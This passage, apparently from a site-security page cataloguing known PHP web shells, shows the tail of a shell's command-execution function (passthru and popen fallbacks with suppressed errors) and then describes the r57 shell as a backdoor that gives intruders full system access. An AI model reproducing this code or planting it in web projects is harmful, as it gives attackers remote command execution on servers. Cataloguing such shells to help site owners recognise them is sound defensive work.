@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
|
| and the famousr57.txt (so-called "Rip57 shell") from AFTER-InFeRnUM@mail.com |
A dark piece of dirty code of an unusual big a size for dropped files (102 KB), giving the hacker a complete view over your system (and filesystem) from an abuse point of view. look at the end for this : PHP Injection Shell - last modified by Vassora@dalnet | <a href=http://baliemhekerforum.co.nr>BHT-CREW</a> Harmless Screenshots : r57.pdf (PDF, 32KB) |
standard HTML 4+ :: last update : 2010-03-04 09:33:11 :: http://www.edainworks.com 
